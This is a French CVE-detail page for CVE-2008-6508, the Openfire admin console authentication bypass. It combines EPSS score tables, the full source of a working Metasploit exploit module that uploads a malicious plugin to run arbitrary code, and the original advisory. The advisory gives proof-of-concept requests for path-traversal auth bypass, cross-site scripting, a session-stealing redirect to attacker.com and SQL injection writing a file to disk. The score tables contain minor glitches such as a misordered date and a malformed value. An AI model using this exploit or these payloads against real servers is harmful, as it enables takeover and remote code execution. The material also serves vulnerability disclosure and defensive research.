CVE-2008-6508 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	80.1%	–	–
2023-01-08	–	–	80.1%	–	–
2023-03-12	–	–	–	64.28%	–
2023-03-26	–	–	–	62.88%	–
2023-05-14	–	–	–	61.2%	–
2023-07-02	–	–	–	61.46%	–
2023-07-09	–	–	–	65.06%	–
2023-08-13	–	–	–	62.2%	–
2023-11-05	–	–	–	60.9%	–
2024-01-07	–	–	–	60.9%	–
2024-05-12	–	–	–	66.55%	–
2024-06-02	–	–	–	66.55%	–
2024-10-06	–	–	–	68.92%	–
2024-12-22	–	–	–	77.52%	–
2025-03-02	–	–	–	77.52%	–
2025-01-19	–	–	–	77.52%	–
2025-03-09	–	–	–	77.52%	–
2025-03-18	–	–	–	–	75.42%
2025-04-08	–	–	–	–	75.3%
2025-04-08	–	–	–	–	75.3,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	99%
2023-01-08	1%
2023-03-12	97%
2023-03-26	97%
2023-05-14	97%
2023-07-02	97%
2023-07-09	97%
2023-08-13	97%
2023-11-05	97%
2024-01-07	98%
2024-05-12	98%
2024-06-02	98%
2024-10-06	98%
2024-12-22	98%
2025-03-02	99%
2025-01-19	98%
2025-03-09	99%
2025-03-18	99%
2025-04-08	99%
2025-04-08	99%

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'rex/zip' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /(Jetty)/ ] } include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Openfire Admin Console Authentication Bypass', 'Description' => %q{ This module exploits an authentication bypass vulnerability in the administration console of Openfire servers. By using this vulnerability it is possible to upload/execute a malicious Openfire plugin on the server and execute arbitrary Java code. This module has been tested against Openfire 3.6.0a. It is possible to remove the uploaded plugin after execution, however this might turn the server in some kind of unstable state, making re-exploitation difficult. You might want to do this manually. }, 'Author' => [ 'Andreas Kurtz', # Vulnerability discovery 'h0ng10' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2008-6508' ], [ 'OSVDB', '49663' ], [ 'BID', '32189' ], [ 'EDB', '7075' ], [ 'URL', 'http://community.igniterealtime.org/thread/35874' ] ], 'DisclosureDate' => 'Nov 10 2008', 'Privileged' => true, 'Platform' => ['java', 'win', 'linux' ], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Targets' => [ # # Java version # [ 'Java Universal', { 'Arch' => ARCH_JAVA, 'Platform' => 'java' } ], # # Platform specific targets # [ 'Windows x86 (Native Payload)', { 'Platform' => 'win', 'Arch' => ARCH_X86, } ], [ 'Linux x86 (Native Payload)', { 'Platform' => 'linux', 'Arch' => ARCH_X86, } ] ], 'DefaultTarget' => 0, )) register_options( [ Opt::RPORT(9090), OptString.new('TARGETURI', [true, 'The base path to the web application', '/']), OptString.new('PLUGINNAME', [ false, 'Openfire plugin base name, (default: random)' ]), OptString.new('PLUGINAUTHOR',[ false, 'Openfire plugin author, (default: random)' ]), OptString.new('PLUGINDESC', [ false, 'Openfire plugin description, (default: random)' ]), OptBool.new('REMOVE_PLUGIN', [ false, 'Try to remove the plugin after installation', false ]), ], self.class) end def check base = target_uri.path base << '/' if base[-1, 1] != '/' path = "#{base}login.jsp" res = send_request_cgi( { 'uri' => path }) if (not res) or (res.code != 200) print_error("Unable to make a request to: #{path}") return Exploit::CheckCode::Unknown end versioncheck = res.body =~ /Openfire, \D*: (\d)\.(\d).(\d)\s*<\/div>/ if versioncheck.nil? then print_error("Unable to detect Openfire version") return Exploit::CheckCode::Unknown end print_status("Detected version: #{$1}.#{$2}.#{$3}") version = "#{$1}#{$2}#{$3}".to_i return Exploit::CheckCode::Safe if version > 360 # Just to be sure, try to access the log page path = "#{base}setup/setup-/../../log.jsp" res = send_request_cgi( { 'uri' => path }) if (not res) or (res.code != 200) print_error("Failed: Error requesting #{path}") return Exploit::CheckCode::Unknown end Exploit::CheckCode::Vulnerable end def get_plugin_jar(plugin_name) files = [ [ "logo_large.gif" ], [ "logo_small.gif" ], [ "readme.html" ], [ "changelog.html" ], [ "lib", "plugin-metasploit.jar" ] ] jar = Rex::Zip::Jar.new jar.add_files(files, File.join(Msf::Config.install_root, "data", "exploits", "CVE-2008-6508")) plugin_author = datastore['PLUGINAUTHOR'] || rand_text_alphanumeric(8+rand(8)) plugin_desc = datastore['PLUGINDESC'] || rand_text_alphanumeric(8+rand(8)) plugin_xml = File.open(File.join(Msf::Config.install_root, "data", "exploits", "CVE-2008-6508", "plugin.xml"), "rb") {|fd| fd.read() } plugin_xml.gsub!(/PLUGINNAME/, plugin_name) plugin_xml.gsub!(/PLUGINDESCRIPTION/, plugin_desc) plugin_xml.gsub!(/PLUGINAUTHOR/, plugin_author) jar.add_file("plugin.xml", plugin_xml) jar end def exploit base = target_uri.path base << '/' if base[-1, 1] != '/' plugin_name = datastore['PLUGINNAME'] || rand_text_alphanumeric(8+rand(8)) plugin = get_plugin_jar(plugin_name) arch = target.arch plat = [Msf::Module::PlatformList.new(target['Platform']).platforms[0]] if (p = exploit_regenerate_payload(plat, arch)) == nil print_error("Failed to regenerate payload") return end plugin.add_file("lib/#{rand_text_alphanumeric(8)}.jar", payload.encoded_jar.pack) plugin.build_manifest # Upload the plugin to the server print_status("Uploading plugin #{plugin_name} to the server") boundary = rand_text_alphanumeric(6) data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"uploadfile\"; " data << "filename=\"#{plugin_name}.jar\"\r\nContent-Type: application/java-archive\r\n\r\n" data << plugin.pack data << "\r\n--#{boundary}--" res = send_request_cgi({ 'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?uploadplugin", 'method' => 'POST', 'data' => data, 'headers' => { 'Content-Type' => 'multipart/form-data; boundary=' + boundary, 'Content-Length' => data.length, 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}", } }) print_error("Warning: got no response from the upload, continuing...") if !res # Delete the uploaded JAR file if datastore['REMOVE_PLUGIN'] print_status("Deleting plugin #{plugin_name} from the server") res = send_request_cgi({ 'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?deleteplugin=#{plugin_name.downcase}", 'headers' => { 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}", } }) if not res print_error("Error deleting the plugin #{plugin_name}. You might want to do this manually.") end end end end

Advisory: Openfire Server Multiple Vulnerabilities Advisory ID: AKADV2008-001 Release Date: 2008/11/07 Revision: 1.0 Last Modified: 2008/11/07 Date Reported: 2008/05/17 Author: Andreas Kurtz (mail at andreas-kurtz.de) Affected Software: Openfire Server <= 3.6.0a Remotely Exploitable: Yes Risk: Critical (x) High ( ) Medium ( ) Low ( ) Vendor URL: http://www.igniterealtime.org http://www.jivesoftware.com/ Vendor Status: No patch released yet. Patch development time: N/A Vulnerability description: -------------------------- The jabber server Openfire (<= version 3.6.0a) contains several serious vulnerabilities. Depending on the particular runtime environment these issues can potentially even be used by an attacker to execute code on operating system level. 1) Authentication bypass This vulnerability provides an attacker full access to all functions in the admin webinterface without providing any user credentials. The Tomcat filter which is responsible for authentication could be completely circumvented. 2) SQL injection It is possible to pass SQL statements to the backend database through a SQL injection vulnerability. Depending on the particular runtime environment and database permissions it is even possible to write files to disk and execute code on operating system level. 3) Multiple Cross-Site Scripting Permits arbitrary insertion of HTML- and JavaScript code in login.jsp. An attacker could also manipulate a parameter to specify a destination to which a user will be forwarded to after successful authentication. Technical details: ------------------ 1) Authentication bypass Authentication to the openfire admin interface is secured by a filter in the Tomcat application server (org.jivesoftware.admin.AuthCheckFilter). This filter guarantees that access to the admin interface is only granted to authenticated users. Otherwise they get redirected to a login page. A design error in Openfire enables access to internal functions without the need for admin user credentials. The deployment descriptor (web.xml) configures some exclude values for the AuthCheckFilter: <filter> <filter-name>AuthCheck</filter-name> <filter-class>org.jivesoftware.admin.AuthCheckFilter</filter-class> <init-param> <param-name>excludes</param-name> <param-value>login.jsp,index.jsp?logout=true,setup/index.jsp, setup/setup-,.gif,.png,error-serverdown.jsp</param-value> </init-param> </filter> When a request URL contains one of these Exclude-Strings the auth check mechanism is totally circumvented. This was considered necessary for the initial setup process or the presence plugin. Following POC demonstrates how an attacker could access internal functions by manipulating the URL providing one of these excludes(/setup/setup-/../../): http://www.foo.bar:9090/setup/setup-/../../log.jsp?log=info&mode=asc&lines= All 2) SQL injection The parameter "type" in sipark-log-summary.jsp is prone to SQL injection. Untrusted user data enters the application in sipark-log-summary.jsp (line 163): String type = ParamUtils.getParameter(request, "type"); The function getCalls() in org.jivesoftware.openfire.sip.calllog.CallLogDAO processes this user input (SQLCondition) and constructs a SQL statement: String sql = "SELECT * FROM sipPhoneLog"; sql = SQLCondition != null && !SQLCondition.equals("") ? sql + " WHERE " + SQLCondition : sql; sql += " ORDER BY datetime DESC"; That statement is executed in the method createScrollablePreparedStatement() in CallLogDAO (line 411): return con.prepareStatement(sql); In that case there is a SQL injection vulnerability present even though prepared statemens are used. This happens because the string sql is dynamically concatenated *before* it is passed to the prepared statement object. 3) Cross-Site Scripting The parameter "url" in login.jsp was vulnerable to Cross-Site Scripting (XSS). This vulnerability is the only one which was fixed within the last 6 months. http://www.foo.bar:9090/login.jsp?url="/><script>alert(document.cookie);</s cript> An attacker could also manipulate the parameter to specify a destination to which a user will be forwarded to after successful authentication: http://www.foo.bar:9090/login.jsp?url=http://www.attacker.com/StealSession If a user authenticates using that link it is easily possible for an attacker to hijack the users session. Furthermore the parameter "username" in login.jsp is still vulnerable to Cross-Site Scripting attacks. Putting it all together: ------------------------ Since the SIP-Plugin is deactivated by default, an attacker needs to install it using the authentication bypass vulnerability and the following POST request: POST http://www.foo.bar:9090/setup/setup-/../../dwr/exec/downloader.installPlugi n.dwr HTTP/1.1 Host: www.foo.bar:9090 callCount=1 c0-scriptName=downloader c0-methodName=installPlugin c0-id=7931_1210973487852 c0-param0=string:http%3A%2F%2Fwww.igniterealtime.org%2Fprojects%2Fopenfire% 2Fplugins%2Fsip.jar c0-param1=string:661780277 xml=true After that activation the described SQL injection vulnerability can be used in a single unauthenticated request. The following proof of concept uses a mysql database: http://www.foo.bar:9090/setup/setup-/../../plugins/sip/sipark-log-summary.j sp? type=all'UNION%20SELECT%20'attack-code'%20INTO%20OUTFILE%20'/tmp/attack.sh' %20/*&startDate=Any&endDate=Any&submit=true&get=Search Solution: --------- Since the vendor didn't release a patch within the last 6 months it is highly recommended to deactivate access to the entire admin interface. This can be achieved for example by blocking the according ports (tcp/9090 & tcp/9091 by default) with a firewall. Following communication to the admin interface can be done via SSL tunnels. For more details see: http://www.andreas-kurtz.de/archives/63 History: -------- 2008/05/17 - Vendor notified using sales@jivesoftware.com 2008/05/18 - Vendor notified using gaston@jivesoftware.com 2008/05/20 - Vendor response 2008/05/20 - Detailed vulnerability information sent to the vendor 2008/05/21 - Vendor confirms the vulnerability 2008/08/18 - Asked vendor for up to date information regarding the reported issues 2008/10/18 - Again asked vendor for up to date information regarding the reported issues 2008/10/31 - Informed vendor of planned advisory realease on 2008/11/05 (no response) 2008/11/07 - Full technical details and recommended measures released to general public Credits: -------- Vulnerability found and advisory written by Andreas Kurtz. References: ----------- http://www.andreas-kurtz.de/archives/63 Changes: -------- Revision 0.1 - Initial draft release to the vendor Revision 1.0 - Final version released to general public Disclaimer: ----------- The information within this advisory may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. # milw0rm.com [2008-11-09]